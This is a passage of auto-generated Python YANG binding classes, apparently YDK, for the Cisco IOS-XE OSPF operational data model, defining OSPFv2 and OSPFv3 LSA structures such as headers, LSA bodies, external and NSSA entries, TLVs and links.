self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value)
class Network(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, self).__init__()
self.yang_name = "network"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])),
])
self.attached_router = []
self.lsa_net_options = Bits()
self._segment_path = lambda: "network"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value)
class Prefix(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, self).__init__()
self.yang_name = "prefix"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])),
('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])),
])
self.metric = None
self.ia_prefix = None
self.ia_prefix_options = None
self._segment_path = lambda: "prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value)
class IaRouter(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, self).__init__()
self.yang_name = "ia-router"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])),
('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])),
])
self.metric = None
self.destination_router_id = None
self.lsa_ia_options = Bits()
self._segment_path = lambda: "ia-router"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value)
class LsaExternal(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, self).__init__()
self.yang_name = "lsa-external"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags))])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
])
self.metric = None
self.referenced_ls_type = None
self.external_prefix = None
self.external_prefix_options = None
self.forwarding_address = None
self.external_route_tag = None
self.referenced_link_state_id = None
self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags()
self.flags.parent = self
self._children_name_map["flags"] = "flags"
self._segment_path = lambda: "lsa-external"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
class Flags(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, self).__init__()
self.yang_name = "flags"
self.yang_parent_name = "lsa-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
])
self.e_flag = None
self._segment_path = lambda: "flags"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, ['e_flag'], name, value)
class Nssa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, self).__init__()
self.yang_name = "nssa"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal))])
self._leafs = OrderedDict()
self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal()
self.lsa_nssa_external.parent = self
self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external"
self._segment_path = lambda: "nssa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, [], name, value)
class LsaNssaExternal(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, self).__init__()
self.yang_name = "lsa-nssa-external"
self.yang_parent_name = "nssa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags))])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
])
self.metric = None
self.referenced_ls_type = None
self.external_prefix = None
self.external_prefix_options = None
self.forwarding_address = None
self.external_route_tag = None
self.referenced_link_state_id = None
self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags()
self.flags.parent = self
self._children_name_map["flags"] = "flags"
self._segment_path = lambda: "lsa-nssa-external"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
class Flags(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__()
self.yang_name = "flags"
self.yang_parent_name = "lsa-nssa-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
])
self.e_flag = None
self._segment_path = lambda: "flags"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value)
class LinkData(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, self).__init__()
self.yang_name = "link-data"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])),
('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])),
('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])),
('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])),
])
self.rtr_priority = None
self.link_local_interface_address = None
self.num_of_prefixes = None
self.lsa_id_options = Bits()
self._segment_path = lambda: "link-data"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value)
class IaPrefix(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, self).__init__()
self.yang_name = "ia-prefix"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])),
('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])),
])
self.referenced_ls_type = None
self.referenced_link_state_id = None
self.referenced_adv_router = None
self.num_of_prefixes = None
self._segment_path = lambda: "ia-prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value)
class Ospfv3Link(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link, self).__init__()
self.yang_name = "ospfv3-link"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])),
('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])),
('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])),
('type', (YLeaf(YType.uint8, 'type'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.interface_id = None
self.neighbor_interface_id = None
self.neighbor_router_id = None
self.type = None
self.metric = None
self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value)
class Ospfv3PrefixList(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, self).__init__()
self.yang_name = "ospfv3-prefix-list"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['prefix']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
])
self.prefix = None
self.prefix_options = None
self._segment_path = lambda: "ospfv3-prefix-list" + "[prefix='" + str(self.prefix) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, ['prefix', 'prefix_options'], name, value)
class Ospfv3IaPrefix(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, self).__init__()
self.yang_name = "ospfv3-ia-prefix"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['prefix']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
])
self.prefix = None
self.prefix_options = None
self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value)
class MultiTopology(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology, self).__init__()
self.yang_name = "multi-topology"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
])
self.name = None
self._segment_path = lambda: "multi-topology" + "[name='" + str(self.name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology, ['name'], name, value)
class Tlv(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv, self).__init__()
self.yang_name = "tlv"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])),
('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
('local_if_ipv4_addr', (YLeafList(YType.str, 'local-if-ipv4-addr'), ['str','str'])),
('local_remote_ipv4_addr', (YLeafList(YType.str, 'local-remote-ipv4-addr'), ['str','str'])),
('te_metric', (YLeaf(YType.uint32, 'te-metric'), ['int'])),
('max_bandwidth', (YLeaf(YType.str, 'max-bandwidth'), ['Decimal64'])),
('max_reservable_bandwidth', (YLeaf(YType.str, 'max-reservable-bandwidth'), ['Decimal64'])),
('unreserved_bandwidth', (YLeaf(YType.str, 'unreserved-bandwidth'), ['Decimal64'])),
('admin_group', (YLeaf(YType.uint32, 'admin-group'), ['int'])),
])
self.link_type = None
self.link_id = None
self.local_if_ipv4_addr = []
self.local_remote_ipv4_addr = []
self.te_metric = None
self.max_bandwidth = None
self.max_reservable_bandwidth = None
self.unreserved_bandwidth = None
self.admin_group = None
self._segment_path = lambda: "tlv"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv, ['link_type', 'link_id', 'local_if_ipv4_addr', 'local_remote_ipv4_addr', 'te_metric', 'max_bandwidth', 'max_reservable_bandwidth', 'unreserved_bandwidth', 'admin_group'], name, value)
class UnknownSubTlv(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv, self).__init__()
self.yang_name = "unknown-sub-tlv"
self.yang_parent_name = "link-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['type']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
('value', (YLeafList(YType.uint8, 'value'), ['int'])),
])
self.type = None
self.length = None
self.value = []
self._segment_path = lambda: "unknown-sub-tlv" + "[type='" + str(self.type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv, ['type', 'length', 'value'], name, value)
class AreaScopeLsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa, self).__init__()
self.yang_name = "area-scope-lsa"
self.yang_parent_name = "intf-link-scope-lsas"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['lsa_type','adv_router']
self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External)), ("ospfv3-lsa", ("ospfv3_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link)), ("ospfv3-prefix", ("ospfv3_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix))])
self._leafs = OrderedDict([
('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
])
self.lsa_type = None
self.adv_router = None
self.decoded_completed = None
self.raw_data = []
self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa()
self.ospfv2_lsa.parent = self
self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"
self.ospfv3_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa()
self.ospfv3_lsa.parent = self
self._children_name_map["ospfv3_lsa"] = "ospfv3-lsa"
self.ospfv2_link = YList(self)
self.ospfv2_topology = YList(self)
self.ospfv2_external = YList(self)
self.ospfv3_link = YList(self)
self.ospfv3_prefix = YList(self)
self.ospfv3_ia_prefix = YList(self)
self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" + "[adv-router='" + str(self.adv_router) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa, ['lsa_type', 'adv_router', 'decoded_completed', 'raw_data'], name, value)
class Ospfv2Lsa(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, self).__init__()
self.yang_name = "ospfv2-lsa"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody))])
self._leafs = OrderedDict()
self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header()
self.header.parent = self
self._children_name_map["header"] = "header"
self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody()
self.lsa_body.parent = self
self._children_name_map["lsa_body"] = "lsa-body"
self._segment_path = lambda: "ospfv2-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, [], name, value)
class Header(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, self).__init__()
self.yang_name = "header"
self.yang_parent_name = "ospfv2-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])),
('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])),
('age', (YLeaf(YType.uint16, 'age'), ['int'])),
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])),
])
self.lsa_id = None
self.opaque_type = None
self.opaque_id = None
self.age = None
self.type = None
self.adv_router = None
self.seq_num = None
self.checksum = None
self.length = None
self.flag_options = Bits()
self._segment_path = lambda: "header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value)
class LsaBody(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, self).__init__()
self.yang_name = "lsa-body"
self.yang_parent_name = "ospfv2-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network))])
self._leafs = OrderedDict([
('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])),
('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])),
('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])),
('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])),
])
self.num_of_links = None
self.summary_mask = None
self.external_mask = None
self.body_flag_options = Bits()
self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network()
self.network.parent = self
self._children_name_map["network"] = "network"
self._segment_path = lambda: "lsa-body"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value)
class Network(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, self).__init__()
self.yang_name = "network"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])),
('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
])
self.network_mask = None
self.attached_router = []
self._segment_path = lambda: "network"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value)
class Ospfv2Link(Entity):
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link, self).__init__()
self.yang_name = "ospfv2-link"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['link_id','link_data']
